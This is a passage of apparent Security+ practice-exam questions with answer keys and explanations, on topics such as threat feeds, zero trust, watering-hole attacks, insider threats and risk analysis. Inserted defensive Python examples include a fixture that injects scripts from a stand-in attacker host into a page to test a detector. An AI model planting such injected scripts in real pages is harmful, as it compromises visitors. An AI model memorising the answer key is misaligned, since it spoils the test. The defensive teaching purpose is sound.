Regulatory changes affect compliance and legal operations but do not pose an immediate risk to the continuity of the facility’s day-to-day functions. While staying compliant with industry regulations is vital, regulatory changes are typically a long-term consideration rather than a sudden, operational risk like a natural disaster. The business continuity team would be more concerned with immediate threats that could halt operations, such as environmental hazards.

Unauthorized access

Explanation

While unauthorized access is a critical security concern, it is typically addressed within the scope of cybersecurity controls (e.g., encryption, access controls, network security). For this scenario, which focuses on business continuity, unauthorized access might not be the most immediate threat compared to natural disasters, which can disrupt operations on a broader scale. Although essential to overall information security, the assessment would prioritize risks like natural disasters that directly impact physical operations and infrastructure.

Correct answer

Natural disasters

Explanation

Natural disasters, such as floods, earthquakes, or hurricanes, pose a significant threat to any physical infrastructure, especially in a research facility housing sensitive designs and research findings. These disasters can cause immediate and widespread disruption, leading to a complete loss of access to facilities, equipment damage, or the destruction of proprietary data. Given the nature of business continuity planning, which aims to ensure operational resilience, natural disasters would likely be identified as a critical risk requiring mitigation strategies like backup sites, disaster recovery protocols, and infrastructure resilience planning.

Overall explanation

5.2 Explain elements of the risk management process.

The risk of natural disasters is most likely to be identified in the business continuity team’s assessment. Since the focus is on proprietary designs and research findings, the possibility of their physical damage or loss increases with the risk of natural disasters occurring.

Domain

5.0 Security Program Management and Oversight

Question 65Skipped

The cybersecurity team at an organization looking to enhance its threat intelligence and hunting process is considering leveraging an information-sharing organization for its threat feed. What is the benefit of such an engagement?

Correct answer

Timely and relevant threat information

Explanation

Timely and relevant threat information is a key benefit of engaging with an information-sharing organization for threat intelligence. By receiving up-to-date and pertinent threat feeds, organizations can stay informed about emerging threats and take proactive measures to protect their systems and data.

Hunting down hackers on the web

Explanation

Hunting down hackers on the web is not a typical function of information-sharing organizations for threat intelligence. While threat feeds can help identify potential threats and adversaries, actively hunting down hackers on the web is a separate and more specialized activity that may involve threat intelligence platforms or cybersecurity experts.

Immunity from cyberattacks

Explanation

Immunity from cyberattacks is not a guaranteed benefit of engaging with an information-sharing organization for threat intelligence. While threat feeds can provide valuable information to enhance cybersecurity defenses, they do not offer complete immunity from cyberattacks.

Forensic support when incidents occur

Explanation

Forensic support when incidents occur is not the primary benefit of leveraging an information-sharing organization for threat feeds. While threat intelligence can assist in incident response and forensic analysis, the main advantage lies in proactively identifying and mitigating potential threats before they result in incidents.

Overall explanation

4.3 Explain various activities associated with vulnerability management.

The benefit of a threat feed from an information-sharing organization is timely and relevant threat information. The feeds provide valuable insights into emerging and trending threats, threat actors, and the vulnerabilities to which the organization’s systems are exposed.

Domain

4.0 Security Operations

Question 66Skipped

A smart city wants to enhance its urban services by deploying IoT devices ranging from traffic cameras and streetlights to waste management. However, there is a growing concern about the security risks associated with firmware vulnerabilities in the IoT devices. Which of the following is an example of such a vulnerability?

Non-compliance with IoT usage regulations

Explanation

Non-compliance with IoT usage regulations is a governance and compliance issue rather than a firmware vulnerability. While compliance with regulations is important for overall security, it is not a specific example of a firmware vulnerability in IoT devices.

Traffic congestion in the IoT devices’ network

Explanation

Traffic congestion in the IoT devices’ network is a network performance issue and does not directly relate to firmware vulnerabilities in IoT devices. While network congestion can impact the functionality of IoT devices, it is not a security vulnerability associated with firmware.

Correct answer

Insufficient encryption between the communicating devices

Explanation

Insufficient encryption between the communicating devices is a common firmware vulnerability in IoT devices. Without proper encryption, data transmitted between devices can be intercepted and compromised, leading to potential security breaches and unauthorized access to sensitive information.

Unauthorized physical access to the IoT devices

Explanation

Unauthorized physical access to the IoT devices is a physical security issue rather than a firmware vulnerability. While physical access can lead to security breaches, it is not directly related to firmware vulnerabilities in IoT devices.

Overall explanation

2.3 Explain various types of vulnerabilities.

An example of a firmware vulnerability in IoT devices is insufficient encryption between the communicating devices. The weakness may allow attackers to decrypt and make sense of the data they manage to capture as they eavesdrop or listen in on the communication between two IoT devices.

Domain

2.0 Threats, Vulnerabilities, and Mitigations

Question 67Skipped

Which method should a software development team that is building a critical application use if they want to ensure that their code is checked for security holes and weaknesses early in the development process?

Security audit

Explanation

Security audits involve reviewing the entire application, including code, configurations, and processes, to identify security issues. While security audits are important for comprehensive security assessments, they are typically conducted at later stages of development and may not be as effective for early detection of security holes in the code.

Dynamic testing

Explanation

Dynamic testing involves running the application and testing it in a live environment to identify vulnerabilities and weaknesses. While dynamic testing is important for overall security testing, it may not be as effective for early detection of security holes in the development process compared to static code analysis.

Correct answer

Static code analysis

Explanation

Static code analysis is the process of analyzing code without executing it to find vulnerabilities, security holes, and weaknesses early in the development process. It helps identify potential security issues by scanning the code for known patterns and vulnerabilities, making it a crucial method for ensuring code security in critical applications.

Penetration tests

Explanation

Penetration tests involve simulating real-world attacks to identify vulnerabilities in the application. While penetration tests are essential for assessing the overall security posture of an application, they are typically conducted later in the development process and may not be as effective for early detection of security holes during code development.

Overall explanation

4.3 Explain various activities associated with vulnerability management.

The software development team should perform static code analysis to ensure that their code is checked for security holes and weaknesses early in the development process. This activity is mainly performed in the early stages of the software development lifecycle to capture issues before they are hardcoded or embedded into the application, so that software flaws in the code can be identified and remediated in time. The practice is also called static application security testing (SAST).

Domain

4.0 Security Operations

Question 68Skipped

What is the potential threat faced by a law firm that uses removable USB drives to transfer various legal documents such as case files, court records, and contracts between their internal staff and external clients?

Correct answer

Unauthorized access to sensitive data

Explanation

Unauthorized access to sensitive data is a critical threat faced by a law firm using removable USB drives for data transfer. If the drives are lost, stolen, or accessed by unauthorized individuals, confidential legal documents could be compromised, leading to potential legal and privacy issues.

Slow transfer speeds over time

Explanation

Slow transfer speeds over time may be an inconvenience, but it is not a significant security threat faced by a law firm using removable USB drives for data transfer.

Damage to the removable devices

Explanation

Damage to the removable devices may result in data loss or corruption, but it is not the primary threat faced by a law firm using USB drives for transferring legal documents.

Compatibility issues with the drives

Explanation

Compatibility issues with the drives can cause operational challenges, but they do not directly pose a security threat to the sensitive legal documents being transferred.

Overall explanation

2.2 Explain common threat vectors and attack surfaces.

The potential threat faced by the law firm using removable USB drives to transfer various legal documents is unauthorized access to sensitive data. Protecting the confidentiality and integrity of their case files, court records, and contracts is crucial, especially when handling files related to legal jurisdictions.

Domain

2.0 Threats, Vulnerabilities, and Mitigations

Question 69Skipped

A security administrator is populating an inventory of all the devices on their corporate network. She is currently in the enumeration stage of the asset-tracking process. What is the goal here?

Blocking of unauthorized devices from the network

Explanation

Blocking unauthorized devices from the network is not the goal of the enumeration stage in asset-tracking. While network security is important, the enumeration stage is primarily focused on identifying and documenting all devices on the network, not taking action against unauthorized devices.

Classifying the assets based on their cost

Explanation

Classifying assets based on their cost is not the goal of the enumeration stage in asset-tracking. While asset classification is important for risk management, the enumeration stage specifically focuses on identifying and documenting devices, not their cost.

Initiating vulnerability scans on the devices

Explanation

Initiating vulnerability scans on devices is not the goal of the enumeration stage in asset-tracking. Vulnerability scans are typically conducted after the assets have been identified and documented to assess their security posture.

Correct answer

Identifying and documenting the devices and their attributes

Explanation

The goal of the enumeration stage in asset-tracking is to identify and document all the devices present on the corporate network, along with their attributes. This helps in creating a comprehensive inventory of assets for better management and security.

Overall explanation

4.2 Explain the security implications of proper hardware, software, and data asset management.

Identifying and documenting the devices and their attributes is the goal of the security administrator in the enumeration stage of the asset-tracking process. Such attributes include the IP address, MAC address, operating system version, manufacturer, and configurations. The activity aids in the maintenance of an accurate inventory of the network assets.

Domain

4.0 Security Operations

Question 70Skipped

Robert usually logs onto his computer during work hours at his office. His company has implemented a zero-trust model with an adaptive identity control plane. What is expected to happen if Robert attempts to access the organization’s network from his personal laptop while working from home?

Robert will need to reset his credentials each time he wants to gain access

Explanation

In a zero-trust model with an adaptive identity control plane, the focus is on continuous verification and monitoring of user identity and device security. Robert will not need to reset his credentials each time he wants to gain access, but he will need to undergo additional authentication and identity verification to ensure secure access.

Robert will not be able to access the resources from his personal laptop

Explanation

In a zero-trust model, access is not restricted based on location or device. However, Robert will need to undergo additional authentication and identity verification to access the organization’s network from his personal laptop while working from home.

Correct answer

Robert will need to undergo additional authentication and identity verification

Explanation

In a zero-trust model with an adaptive identity control plane, access to resources is not automatically granted based on trust. Robert will need to undergo additional authentication and identity verification to ensure that his personal laptop is secure and authorized to access the organization’s network.

Robert will automatically be granted access as he is trusted

Explanation

In a zero-trust model, trust is not automatically granted based on previous access or location. Even though Robert is trusted while using his work computer in the office, accessing the network from his personal laptop at home will still require additional authentication and identity verification.

Overall explanation

1.2 Summarize fundamental security concepts.

Robert will need to undergo additional authentication and identity verification, because a zero-trust model with an adaptive identity control plane must ensure the security of his access attempt. In such a setup, access decisions are typically not based on trust alone, but rather adapt continuously based on various factors such as the identity of the user, their location, context, and the security posture of the device being used to gain access.

Domain

1.0 General Security Concepts

Question 71Skipped

What is the most relevant security consideration for a company planning to adopt a serverless cloud computing model for the development of its application projects?

Correct answer

Securing the deployment of serverless functions

Explanation

Securing the deployment of serverless functions is the most relevant security consideration for a company planning to adopt a serverless cloud computing model. As serverless functions execute code in response to events, ensuring the secure deployment of these functions is crucial to protect against potential security vulnerabilities and data breaches.

Network segmentation implementation

Explanation

Network segmentation implementation is important for overall network security, but it is not the most relevant consideration specifically for a company adopting a serverless cloud computing model. Serverless functions operate independently and do not require traditional network segmentation.

Managing the instances of virtual machines

Explanation

Managing the instances of virtual machines is not the most relevant consideration for a company adopting a serverless cloud computing model. Serverless computing abstracts the infrastructure management, allowing developers to focus on code without managing virtual machines.

Ensuring physical security

Explanation

Ensuring physical security is not the most relevant consideration for a company planning to adopt a serverless cloud computing model. Serverless computing eliminates the need for physical servers, so the focus shifts to securing the virtual environment and data.

Overall explanation

3.1 Compare and contrast security implications of different architecture models.

The most relevant security consideration during the adoption of the serverless cloud computing model is securing the deployment of serverless functions. The developers should focus on writing code for the cloud-specific functions while the cloud provider manages the infrastructure. The serverless functions should be coded securely to avoid vulnerabilities that could lead to exploits or breaches.

Domain

3.0 Security Architecture

Question 72Skipped

Which of the following best depicts the objective of a commercial institution implementing an email archival solution for all its email communications and attachments?

To block unauthorized email access

Explanation

Blocking unauthorized email access is an important aspect of email security, but it is not the primary objective of implementing an email archival solution. Email archival solutions are more focused on data retention, compliance, and retrieval rather than access control.

To prevent phishing attacks and malware

Explanation

Preventing phishing attacks and malware is a valid concern for email security, but it is not directly related to the objective of implementing an email archival solution. Email archival solutions focus on data retention and retrieval rather than security measures.

Correct answer

To ensure that email data may be retained and retrieved

Explanation

This is the correct choice. Implementing an email archival solution ensures that email data, including communications and attachments, can be retained and retrieved when needed. This is crucial for compliance with regulations, legal requirements, and business continuity planning.

To enhance the email server performance and speed

Explanation

Enhancing email server performance and speed is not the primary objective of implementing an email archival solution. The main purpose of an email archival solution is to retain and retrieve email data for compliance, legal, and business continuity purposes.

Overall explanation

4.4 Explain security alerting and monitoring concepts and tools.

The objective of implementing the email archival solution is to ensure that email data may be retained and retrieved for long periods. Organizations can securely store and access their email communications and attachments to meet regulatory and compliance requirements.

Domain

4.0 Security Operations

Question 73Skipped

A sales enterprise is enhancing the security of all its sales operators’ workstations by applying hardening policies. Which of the following methods can they use to minimize the risk of data breaches and unauthorized access?

Blocking all the connections to the workstations

Explanation

Blocking all connections to the workstations may hinder legitimate access to necessary resources and services. While restricting unnecessary connections is important for security, completely blocking all connections can impact productivity and functionality. It is important to implement targeted firewall rules and network segmentation instead of a blanket block on all connections.

Disabling automatic updates

Explanation

Disabling automatic updates can actually increase the risk of data breaches and unauthorized access. Automatic updates are essential for keeping software and operating systems up to date with the latest security patches and fixes. Disabling them can leave workstations vulnerable to known security vulnerabilities.

Allowing employees to download and install security tools

Explanation

Allowing employees to download and install security tools can introduce additional security risks to the workstations. Employees may inadvertently download malicious software disguised as security tools, leading to potential data breaches and unauthorized access.

Correct answer

Strong password policies

Explanation

Strong password policies are an effective method to minimize the risk of data breaches and unauthorized access. By enforcing the use of complex passwords, regularly updating passwords, and implementing multi-factor authentication, the sales enterprise can enhance the security of the workstations and protect sensitive data.

Overall explanation

4.1 Given a scenario, apply common security techniques to computing resources.

The sales enterprise can use strong password policies to minimize the risk of data breaches and unauthorized access. Password policies define the length of the password, its complexity (the inclusion of alphanumeric and special characters), the password history, and so forth.

Domain

4.0 Security Operations

Question 74Skipped

The security department at an organization has identified a security threat on an endpoint and has suspected the presence of a keylogger. What best defines a keylogger?

Correct answer

Software that captures keystrokes on a device

Explanation

Software that captures keystrokes on a device is the correct definition of a keylogger. Keyloggers are malicious software programs designed to capture and record keystrokes entered by a user on a device, often used for stealing sensitive information such as passwords.

Digital key that can unlock keypad-controlled doors

Explanation

A digital key that can unlock keypad-controlled doors is not related to keyloggers. Keyloggers are software tools that capture keystrokes on a device, not physical keys used for access control.

A log file of all the encryption keys

Explanation

A log file of all the encryption keys is not a keylogger. Keyloggers are software tools that capture and record keystrokes on a device, not log files of encryption keys.

Hardware to prevent unauthorized access to an endpoint

Explanation

Hardware to prevent unauthorized access to an endpoint is not a keylogger. Keyloggers are software-based tools that capture and record keystrokes on a device, not physical hardware devices.

Overall explanation

2.4 Given a scenario, analyze indicators of malicious activity.

A keylogger is software that captures keystrokes on a device. It is programmed to record the keys that a user types on their device behind the scenes. The logged keystrokes may be stored at a hidden location on the device or shipped off to a remote location for the attacker to come and collect at a later point in time. Sensitive information such as usernames, passwords, credit card numbers, etc., may all be captured by the keylogger and stolen.

Domain

2.0 Threats, Vulnerabilities, and Mitigations

Question 75Skipped

A group of hackers has observed that the employees of an organization they are targeting frequently visit a popular news forum linked to their institution. The hackers deliberately compromise the news forum with malicious code. What type of attack have they performed?

Social engineering

Explanation

Social engineering involves manipulating individuals into divulging confidential information or performing actions that compromise security. While social engineering tactics may have been used to gather information about the employees’ habits, the primary attack in this scenario is the compromise of the news forum, making it a watering hole attack rather than a social engineering attack.

Correct answer

Watering hole

Explanation

The hackers have performed a watering hole attack by compromising a trusted website frequented by the organization’s employees. This attack aims to infect the employees’ devices when they visit the compromised site, exploiting their trust in the website to gain unauthorized access to the organization’s network.

Zero-day

Explanation

A zero-day attack involves exploiting a previously unknown vulnerability in software or hardware. In this scenario, the hackers did not exploit a zero-day vulnerability but instead compromised a legitimate website frequented by the organization’s employees, making it a watering hole attack rather than a zero-day attack.

Ransomware

Explanation

Ransomware is a type of malware that encrypts a victim’s files and demands payment for their release. The scenario described does not involve ransomware, as the hackers compromised a news forum with malicious code to target the organization’s employees, not encrypt their files for financial gain.

Overall explanation

2.2 Explain common threat vectors and attack surfaces.

The group of hackers has performed a watering hole attack. The attackers compromise a website their intended victims are known to visit and use it to deliver malware to them, rather than attacking the organization's own systems directly. The name comes from a predator poisoning, or lying in wait at, a watering hole that all the animals must eventually visit.

Domain

2.0 Threats, Vulnerabilities, and Mitigations
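As an added example (not part of the practice test or its explanations), the check below shows one way a defender can notice the compromise this question describes: it inventories the scripts a page loads and compares them with a known-good baseline, flagging any new external script origin or any new inline script. The page markup, the baseline and the `cdn-stats.invalid` hostname are constructed for illustration.

```python
"""Baseline check for injected scripts on a page that may have been turned
into a watering hole.

Added example, not from the practice test: the forum markup, the baseline
and the attacker's hostname below are constructed for illustration.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptInventory(HTMLParser):
    """Collect external script origins and SHA-256 digests of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = set()   # scheme://host of every <script src=...>
        self.inline = set()     # sha256 of each inline <script> body
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            u = urlparse(src)
            self.external.add(f"{u.scheme}://{u.netloc}" if u.netloc else "(relative)")
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser treats <script> bodies as CDATA, so markup inside a
        # malicious inline script arrives here as text, not as tags.
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            body = "".join(self._buf).strip().encode()
            self.inline.add(hashlib.sha256(body).hexdigest())
            self._in_inline = False


def inventory(html):
    p = ScriptInventory()
    p.feed(html)
    p.close()
    return p.external, p.inline


def find_injected(baseline_html, current_html):
    """Return (new external origins, new inline script hashes) not in the baseline."""
    base_ext, base_inl = inventory(baseline_html)
    cur_ext, cur_inl = inventory(current_html)
    return sorted(cur_ext - base_ext), sorted(cur_inl - base_inl)


# Constructed sample: the forum's known-good page and a tampered copy.
BASELINE = """<html><head>
<script src="https://forum.example/static/app.js"></script>
<script>window.cfg = {"theme": "light"};</script>
</head><body>news</body></html>"""

TAMPERED = BASELINE.replace(
    "</head>",
    '<script src="https://cdn-stats.invalid/t.js"></script>'
    '<script>document.write("<iframe src=//cdn-stats.invalid/x>");</script></head>',
)

if __name__ == "__main__":
    ext, inl = find_injected(BASELINE, TAMPERED)
    print("new external script origins:", ext)
    print("new inline script hashes:", inl)
```

The same idea is what Subresource Integrity and a strict Content Security Policy enforce in the browser; the offline comparison is useful for a site owner or a security team that wants to detect the injection from the server side rather than rely on every visitor's browser.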

Question 76Skipped

A global e-commerce enterprise is evaluating its business continuity plans to ensure resilience during a disaster. Which of the following disaster recovery site considerations should they apply?

Proximity to the headquarters

Explanation

Proximity to the headquarters may seem like a logical choice for a disaster recovery site, but it can actually be a risk if the headquarters and the recovery site are in the same geographical area. In the event of a regional disaster, both locations could be affected simultaneously, leading to a complete loss of operations.

Data encryption controls

Explanation

Data encryption controls are important for protecting sensitive information, but they are not directly related to disaster recovery site considerations. While data security is crucial for overall business continuity, other factors such as geographic diversity and redundancy play a more significant role in ensuring resilience during a disaster.

Correct answer

Diverse geographic locations

Explanation

Diverse geographic locations for disaster recovery sites are essential to ensure resilience during a disaster. By having recovery sites in different regions, the enterprise can mitigate the risk of a single point of failure and ensure business continuity even if one location is impacted by a disaster.

Large workspace area

Explanation

While having a large workspace area at a disaster recovery site may be beneficial for accommodating staff during a disaster, it is not a critical consideration for ensuring resilience. The focus should be on the site’s ability to maintain operations and data integrity in the event of a disaster.

Overall explanation

3.4 Explain the importance of resilience and recovery in security architecture.

The global e-commerce enterprise should consider diverse geographic locations for its disaster recovery sites. This reduces the risk of the primary data center and the disaster recovery site being affected at the same time by a regional disaster, preserving business continuity during wide-area natural disasters or regional power outages. The sites should be far enough apart not to share the same hazards or utilities, while still meeting the replication and latency needs of the recovery objectives.

Domain

3.0 Security Architecture

Question 77Skipped

An employee with privileged access to sensitive data has recently expressed not being satisfied with her position at the company and has been observed copying confidential financial data during late hours to a remote location. What type of threat is she?

Phisher

Explanation

A phisher is an individual who attempts to deceive others into providing sensitive information, such as passwords or financial details, through fraudulent means. This choice does not accurately describe the scenario of an employee with privileged access copying confidential data.

Black hat

Explanation

A black hat is a term used to describe a hacker who uses their skills for malicious purposes, such as breaking into computer systems or networks without authorization. While the employee in the scenario is engaging in unauthorized activities, the term "black hat" specifically refers to hackers rather than an insider threat.

Correct answer

Insider threat

Explanation

An insider threat refers to a current or former employee, contractor, or business partner who has access to an organization’s sensitive data and misuses that access for malicious purposes. In this scenario, the employee with privileged access copying confidential financial data fits the profile of an insider threat.

Hacktivist

Explanation

A hacktivist is an individual who hacks computer systems or networks to promote a social or political agenda. The scenario does not match a hacktivist's motivation: the employee appears to be acting on a personal grievance with the company rather than to advance a cause.

Overall explanation

5.6 Given a scenario, implement security awareness practices.

The employee is an insider threat. Her behavior raises concern that she is misusing the access she is legitimately authorized to have. Insider threats are individuals within the organization, or former members and partners who retain access, who pose a threat to its resources, data and security.

Domain

5.0 Security Program Management and Oversight

Question 78Skipped

A penetration tester has been provided with significant information about the client’s network topology, IP addresses, network devices, and configurations. What type of penetration test is being performed?

Gray box

Explanation

A gray box penetration test falls between white box and black box tests. The tester has partial knowledge of the client’s network infrastructure, such as some details about the network topology or configurations. This approach simulates an attack from a semi-informed external or internal threat actor.

Red box

Explanation

Red box testing is not a standard term in the context of penetration testing. It may refer to a specialized type of test or a specific methodology not commonly used in the field of cybersecurity.

Black box

Explanation

A black box penetration test is conducted with no prior knowledge of the client’s network infrastructure. The tester approaches the network as an external attacker would, without any insider information. This type of test helps assess the organization’s security posture from an outsider’s perspective.

Correct answer

White box

Explanation

In a white box penetration test, the tester has full knowledge of the client’s network infrastructure, including IP addresses, network devices, and configurations. This type of test allows the tester to simulate an attack from an insider or a malicious employee with privileged access.

Overall explanation

5.5 Explain types and purposes of audits and assessments.

A white box penetration test is being performed. In the SY0-701 objectives this is called a known environment test, with gray box and black box corresponding to partially known and unknown environments. In a white box test the tester is given detailed information about the target, such as the network architecture, devices and their configurations, user accounts and passwords, before the test starts, and generally has sufficient internal access to the systems to assess their security posture properly.

Domain

5.0 Security Program Management and Oversight

Question 79Skipped

An online marketplace connects its buyers and sellers with its web platform. They want to add a means to strengthen the security behind the user data and the website by initiating alerting activities to support them in proactively detecting and responding to security incidents. Which of the following is essential to support their objective?

Correct answer

Sufficient logging of the website transactions

Explanation

Sufficient logging of website transactions is essential for supporting the objective of proactively detecting and responding to security incidents. By logging all website transactions, the online marketplace can monitor and analyze the data to identify any suspicious activities or security breaches in real-time. This logging can help in alerting activities to support proactive security incident detection and response.

Blocking all users from accessing the website

Explanation

Blocking all users from accessing the website is an extreme measure that would disrupt the normal operations of the online marketplace. It does not support the objective of strengthening security behind user data and the website by initiating alerting activities to proactively detect and respond to security incidents.

Conducting scheduled vulnerability scans

Explanation

Conducting scheduled vulnerability scans is important for identifying potential weaknesses in the system that could be exploited by attackers. While this is a good security practice, it does not directly support the objective of proactively detecting and responding to security incidents in real-time.

Installing antivirus software on the web server

Explanation

Installing antivirus software on the web server is a good security practice to protect against malware and other malicious software. However, it is not directly related to the objective of proactively detecting and responding to security incidents through alerting activities.

Overall explanation

4.4 Explain security alerting and monitoring concepts and tools.

The online marketplace should implement sufficient logging of website transactions to proactively detect and respond to security incidents. Recording and monitoring user interactions on the platform makes it possible to identify suspicious or malicious activity as it happens. For the logs to support alerting they must be collected centrally (for example in a SIEM), protected from tampering or deletion, and matched against rules or baselines, since a log nobody evaluates does not produce an alert.

Domain

4.0 Security Operations
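The alerting the explanation refers to only exists once logged transactions are evaluated against rules. As an added example that is not part of the practice test, the Python below runs three such rules over a constructed web transaction log: a burst of failed logins from one source, a successful login immediately after that burst, and a sensitive account change made from a source that has already been flagged. The log format, the field names, the thresholds and the set of sensitive actions are assumptions made for this example.

```python
"""Alerting rules over web transaction logs (added example, not from the test).

The log format and thresholds are this example's assumptions. Each line:
ISO timestamp, client IP, user, action, result.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log: one source sprays several accounts, one normal user.
SAMPLE_LOG = """\
2024-03-01T10:00:01Z 203.0.113.7 alice  LOGIN   FAIL
2024-03-01T10:00:03Z 203.0.113.7 bob    LOGIN   FAIL
2024-03-01T10:00:04Z 203.0.113.7 carol  LOGIN   FAIL
2024-03-01T10:00:06Z 203.0.113.7 dave   LOGIN   FAIL
2024-03-01T10:00:08Z 203.0.113.7 erin   LOGIN   FAIL
2024-03-01T10:00:09Z 203.0.113.7 erin   LOGIN   OK
2024-03-01T10:00:15Z 203.0.113.7 erin   CHANGE_PAYOUT_ACCOUNT OK
2024-03-01T10:01:00Z 198.51.100.9 frank LOGIN   OK
2024-03-01T10:01:30Z 198.51.100.9 frank BUY     OK
"""

FAIL_THRESHOLD = 5             # failed logins per source ...
WINDOW = timedelta(minutes=1)  # ... within this sliding window
SENSITIVE = {"CHANGE_PAYOUT_ACCOUNT", "CHANGE_EMAIL", "ADD_PAYMENT_METHOD"}


def parse(line):
    ts, ip, user, action, result = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user, action, result


def evaluate(log_text):
    """Run the rules over the log; return a list of (rule, ip, user, timestamp)."""
    alerts = []
    fails = defaultdict(deque)   # ip -> timestamps of recent LOGIN FAIL
    flagged_ips = set()          # sources that tripped the burst rule
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, action, result = parse(line)
        if action == "LOGIN":
            q = fails[ip]
            # forget failures that have slid out of the window
            while q and ts - q[0] > WINDOW:
                q.popleft()
            if result == "FAIL":
                q.append(ts)
                if len(q) >= FAIL_THRESHOLD and ip not in flagged_ips:
                    flagged_ips.add(ip)
                    alerts.append(("login_failure_burst", ip, "*", ts))
            elif result == "OK" and q:
                # a success right after a run of failures is the classic
                # credential-stuffing or password-spray hit
                alerts.append(("success_after_failures", ip, user, ts))
        elif action in SENSITIVE and ip in flagged_ips:
            alerts.append(("sensitive_change_from_flagged_ip", ip, user, ts))
    return alerts


if __name__ == "__main__":
    for rule, ip, user, ts in evaluate(SAMPLE_LOG):
        print(f"{ts.isoformat()} {rule:32} ip={ip} user={user}")
```

In production the same rules would run in a SIEM over logs shipped off the web servers; the point of the example is that the transaction log must carry the fields a rule needs (time, source, user, action, outcome), or there is nothing to alert on.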

Question 80Skipped

What is a likely consequence that a financial institution may face for non-compliance with data protection and privacy regulations?

Correct answer

The institution may face business and operation sanctions

Explanation

Non-compliance with data protection and privacy regulations can result in business and operation sanctions for a financial institution. This can include fines, penalties, and restrictions on certain business activities, which can have a significant impact on the institution’s financial stability and reputation.

All the employees will go to jail

Explanation

Non-compliance with data protection and privacy regulations does not typically result in all employees going to jail. While individuals responsible for the non-compliance may face legal consequences, such as fines or sanctions, it is unlikely that all employees would be held personally liable to the extent of imprisonment.

The institution shall have to stop all its operations

Explanation

While non-compliance with data protection and privacy regulations can have serious consequences, it is unlikely that a financial institution would be required to stop all of its operations immediately. However, the institution may face legal actions, fines, and other penalties that could impact its ability to operate effectively.

The situation is normal so it is not a major issue

Explanation

Non-compliance with data protection and privacy regulations is not a normal or minor issue. It is a serious violation that can have legal, financial, and reputational consequences for the institution. Ignoring or downplaying the importance of compliance can lead to severe repercussions.

Overall explanation

5.4 Summarize elements of effective security compliance.

The institution may face business and operational sanctions for non-compliance with data protection and privacy regulations. Severe consequences such as regulatory fines, legal penalties and restrictions on business activities may be imposed for mishandling sensitive data.

Domain

5.0 Security Program Management and Oversight

Question 81Skipped

A software development agency is performing a risk analysis of a new software project in their pipeline and is evaluating the security risks associated with the project. After identifying the risks, they have started prioritizing them. How would a qualitative risk analysis benefit the software development team?

Numerical values are assigned to all the risks

Explanation

Numerical values assigned to risks are typically part of quantitative risk analysis, not qualitative risk analysis. In qualitative risk analysis, risks are assessed based on their impact and likelihood without assigning numerical values.

Correct answer

Risks are prioritized based on their potential likelihood and impact

Explanation

Qualitative risk analysis helps the software development team prioritize risks by considering the potential likelihood and impact of each risk. By focusing on these factors, the team can address the most critical risks first and allocate resources effectively to mitigate them.

Specific vulnerabilities are identified and weighted

Explanation

While specific vulnerabilities may be identified in a risk analysis, weighting them is more commonly associated with quantitative risk analysis rather than qualitative risk analysis. Qualitative risk analysis focuses on prioritizing risks based on their potential impact and likelihood.

Comprehensive risk mitigation plans are developed

Explanation

Developing comprehensive risk mitigation plans is an important step in risk management, but it is not directly related to the benefits of qualitative risk analysis. Qualitative risk analysis helps in prioritizing risks based on their potential impact and likelihood, which can guide the development of effective risk mitigation strategies.

Overall explanation

5.2 Explain elements of the risk management process.

A qualitative risk analysis ensures that risks are prioritized based on their potential likelihood and impact. Each risk is rated on ordinal scales such as low, medium and high for both likelihood and impact, without assigning monetary or numerical values, so the team can decide which risks to address first. A common tool for qualitative risk analysis is the Probability/Likelihood versus Impact Risk Matrix.

Domain

5.0 Security Program Management and Oversight
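As an added example (not from the practice test), the Python below implements the Likelihood versus Impact Risk Matrix named in the explanation and uses it to order a constructed list of project risks. The three-level scales, the contents of the matrix cells and the sample risks are assumptions of this example; a real team defines its own.

```python
"""Likelihood x impact matrix for qualitative risk prioritisation.

Added example, not from the practice test. The scales, matrix cells and
sample risks below are constructed for illustration.
"""
LEVELS = ["low", "medium", "high"]   # ordinal scale; no numbers are attached

# Rating is read from the matrix cell indexed by (likelihood, impact).
MATRIX = {
    ("low", "low"): "low",       ("low", "medium"): "low",       ("low", "high"): "medium",
    ("medium", "low"): "low",    ("medium", "medium"): "medium", ("medium", "high"): "high",
    ("high", "low"): "medium",   ("high", "medium"): "high",     ("high", "high"): "critical",
}
ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3}


def rate(likelihood, impact):
    """Map two ordinal ratings to a risk rating; reject values off the scale."""
    if likelihood not in LEVELS or impact not in LEVELS:
        raise ValueError(f"unknown level: {likelihood!r}/{impact!r}")
    return MATRIX[(likelihood, impact)]


def prioritise(risks):
    """risks: list of (name, likelihood, impact).

    Returns [(rating, name), ...] highest first. Ties within a rating are
    broken by impact, so a high-impact 'medium' is worked before a
    low-impact one; remaining ties fall back to name for a stable order.
    """
    rated = [(rate(lik, imp), name, imp) for name, lik, imp in risks]
    rated.sort(key=lambda r: (ORDER[r[0]], -LEVELS.index(r[2]), r[1]))
    return [(rating, name) for rating, name, _ in rated]


# Constructed risk register for the software project in the question.
SAMPLE_RISKS = [
    ("Hard-coded cloud credentials in repo", "high", "high"),
    ("Outdated dependency with known RCE", "medium", "high"),
    ("Verbose error pages leak stack traces", "high", "low"),
    ("Missing rate limit on password reset", "medium", "medium"),
    ("Dev docs mention internal hostnames", "low", "low"),
]

if __name__ == "__main__":
    for rating, name in prioritise(SAMPLE_RISKS):
        print(f"{rating:9} {name}")
```

Note that the ordering is the only output: qualitative analysis tells the team what to work on first, not what a risk costs, which is why the "numerical values" option belongs to quantitative analysis.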

Question 82Skipped

A trading agency wants to physically restrict unauthorized access to its data center where all its critical application and database servers reside. Which is the most effective preventive control that they may implement?

Security cameras

Explanation

Security cameras can help monitor activity in the data center, but they are not a direct preventive control for restricting unauthorized access. While they can provide valuable footage for investigation after an incident, they do not actively prevent unauthorized individuals from entering the data center.

Correct answer

Biometrics

Explanation

